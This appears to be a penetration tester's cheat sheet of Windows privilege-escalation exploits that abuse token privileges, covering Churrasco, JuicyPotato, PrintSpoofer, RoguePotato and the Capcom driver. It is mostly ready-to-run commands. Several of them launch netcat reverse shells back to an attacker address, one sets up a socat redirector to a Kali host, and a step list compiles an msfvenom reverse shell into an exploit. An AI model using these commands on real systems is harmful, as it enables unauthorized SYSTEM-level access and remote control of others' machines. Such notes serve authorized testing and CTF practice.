# windows token exploits

## Churrasco

**REQUIREMENTS:**

* SeImpersonalPrivilege
* Windows XP/VISTA/2003/2008, Win Server 2003

```bash
# usage
> churrasco.exe -d "nc.exe -e cmd.exe IP PORT"
```

## HotPotato

* Windows 7,8,10, Server 2008, Server 2012

## [JuicyPotato](https://github.com/ohpe/juicy-potato)

**REQUIREMENTS:**

* SeImpersonatePrivilege
* machine is < Windows 10 1809 < Windows Server 2019
* CLSID: <http://ohpe.it/juicy-potato/CLSID/>
  * Can use <http://ohpe.it/juicy-potato/CLSID/GetCLSID.ps1>
* Try: `{03ca98d6-ff5d-49b8-abc6-03dd84127020}`

```bash
> JuicyPotato.exe -l 1337 -p "c:\windows\system32\cmd.exe" -a "/c PATH\nc.exe -e cmd.exe IP PORT" -t * -c CLSID
> Juicy.Potato.x86.exe -l 1337 -p "c:\users\public\kashz.exe" -t * -c CLSID

> PSExec64.exe -i -u "nt authority\local service" <shell.exe>
```

## [PrintSpoofer](https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0)

**REQUIREMENTS:**

* SeImpersonatePrivilege
* Win10, Server 2016, Server 2019

```bash
> PrintSpoofer.exe -i -c cmd.exe
> PrintSpoofer.exe -c "nc.exe IP PORT -e cmd.exe"
# -i : interactive
# -c : command to run
```

## [RoguePotato](https://github.com/antonioCoco/RoguePotato)

**REQUIREMENTS:**

* SeImpersonatePrivilege
* machine is >= Windows 10 1809 & Windows Server 2019

```bash
# socat redirector for OXID resolving, must use 135
$ socat tcp-listen:135,reuseaddr,fork tcp:KALI_IP:9999
> RoguePotato.exe -r KALI_IP -e "PATH\nc.exe IP PORT -e cmd.exe" -l 9999
```

## [SeLoadDriverPrivilege](https://book.hacktricks.xyz/windows/active-directory-methodology/privileged-accounts-and-token-privileges#capcom-sys-driver-exploit)

**REQUIREMENTS:**

* Visual Studio to compile

### Steps:

1. obtain user SID
   1. `Get-ADUser -Identity 'svc-print' | select SID`
   2. `(New-Object System.Security.Principal.NTAccount("svc-print")).Translate([System.Security.Principal.SecurityIdentifier]).value`
2. Clone Repo: [tandasat/ExploitCapcom/](https://github.com/tandasat/ExploitCapcom/)
3. Generate `.exe` msfvenom reverse shell
4. Update path to reverse shell on target line 410 in file `ExploitCapcom.cpp`
5. Set for RELEASE
6. Build Solution
7. run `.\ExploitCapcom.exe`

## SeBackupPrivilege

* <https://github.com/giuliano108/SeBackupPrivilege>